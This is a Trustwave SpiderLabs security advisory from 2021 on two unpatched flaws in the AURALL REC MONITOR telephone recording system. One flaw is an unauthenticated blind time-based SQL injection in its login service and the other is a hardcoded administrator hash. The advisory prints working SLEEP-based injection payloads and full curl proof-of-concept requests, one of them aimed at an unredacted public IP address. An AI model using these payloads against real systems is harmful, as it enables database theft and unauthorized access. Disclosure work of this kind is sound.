Trustwave SpiderLabs Security Advisory TWSL2021-007: Multiple Vulnerabilities in AURALL REC MONITOR Published: 04/21/2021 Version: 1.1 Vendor: VOID Sistemas (https://www.void.es) Product: AURALL REC MONITOR Version affected: 9.0.0.1 Product description: Telephone Recording System AURALL is a computer system based on open architecture PC for recording, storage in database, administration and management of telephone conversations made through telephone channels, radio channels or extensions of telephone exchanges. Using AURALL, you can (through the power of a relational database server, the SQL language and the computer applications that connect to this database) obtain all the necessary features to store conversations, perform searches, playback recordings, add labels to them, export the audio to a sound file to be handled externally (send by e-mail, play it in another system) or use the additional fields to store extra information. Finding 1: Blind time-based SQL Injection. *****Credit: Andreas Georgiou of Trustwave SpiderLabs (@superhedgy) CVE: CVE-2021-25899 CWE: CWE-89 Description of Finding: This is an instance of "blind" SQL Injection, meaning that the application does not return significant data during the attack. This makes exploitation more difficult, but still possible. For example, data can be inferred one bit at a time based on subtle differences in the server's response, or even in the amount of time taken by the server to generate a response. By exploiting this vulnerability it was possible to exfiltrate the contents of the underlying database management system. Payload Details: --- Location: https:///AurallRECMonitor/services/svc-login.php HTTP Method: POST Authentication: Not Required Vulnerable Parameter: param1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: param1=dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy¶m2=test Sample POST Body: param1=dummy'+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))dummy)--+dummy%26param2%3dtest¶m2=test --- Evidence 1.1: Please note this is a time-based exploit. The following request and response pairs are a Proof of Concept (PoC) of SQL queries executed on the database management system. $ curl -i -s -k -X $'POST' -H $'Host: xxx.xxx.xxx.xxx' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 38' -H $'Origin: https://xxx.xxx.xxx.x78' -H $'Connection: close' -H $'Referer: https://xxx.xxx.xxx.xxx/AurallRECMonitor/login.php' -H $'Cookie: PHPSESSID=mfhpg5af2jf8b21c0fc573dmkf' -b $'PHPSESSID=mfhpg5af2jf8b21c0fc573dmkf' --data-binary $'param1=vulnrable_parameter¶m2=test' $'https://xxx.xxx.xxx.xxx/AurallRECMonitor/services/svc-login.php' ; echo -e "\n\n" HTTP/1.1 200 OK Date: Wed, 02 Dec 2020 17:49:18 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.11 X-Powered-By: PHP/7.4.11 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 27 Connection: close Content-Type: text/html; charset=UTF-8 Evidence 1.2: Raw HTTP evidence showing a PoC payload executed on the AURALL server. $ curl -i -s -k -X $'POST' \ > -H $'Host: xxx.xxx.xxx.xxx' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:83.0) Gecko/20100101 Firefox/83.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H $'Content-Length: 51' -H $'Origin: https://xxx.xxx.xxx.xxx' -H $'Connection: close' -H $'Referer: https://xxx.xxx.xx.xxx/AurallRECMonitor/login.php' -H $'Cookie: PHPSESSID=mfhpg5af2jf8b21c0fc573dmkf' \ > -b $'PHPSESSID=mfhpg5af2jf8b21c0fc573dmkf' \ > --data-binary $'param1=admin\'%2b(select(sleep(10)))%2b\'¶m2=test' \ > $'https://195.53.213.178/AurallRECMonitor/services/svc-login.php' HTTP/1.1 200 OK Date: Wed, 02 Dec 2020 18:07:36 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.4.11 X-Powered-By: PHP/7.4.11 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 63 Connection: close Content-Type: text/html; charset=UTF-8 Finding 2: Hardcoded Credentials in the source code. *****Credit: Andreas Georgiou of Trustwave SpiderLabs (@superhedgy) CVE: CVE-2021-25898 CWE: CWE-798 Description of Finding: SpiderLabs discovered passwords stored in unencrypted source code text files. This was noted when accessing source code in the 'svc-login.php' file. The hardcoded hash value is used to authenticate a high privileged administrator with the web application. Evidence 2.1: The web application compares the submitted user/password pair with the SHA256 hash value hardcoded in the source code. Remediation Steps: No fix is available for these vulnerabilities. To limit exposure, the application should only be accessible on the local network. Additionally, it is highly recommended that the administrator setup proper network segmentation and only authorized personnel has access through the use of Access Control Lists. Revision History: 12/02/2020 - Vendor contacted with no response 12/15/2020 - Vendor contacted with no response 01/08/2021 - Vendor contacted with no response 04/21/2021 - Advisory published About Trustwave: Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com. About Trustwave SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.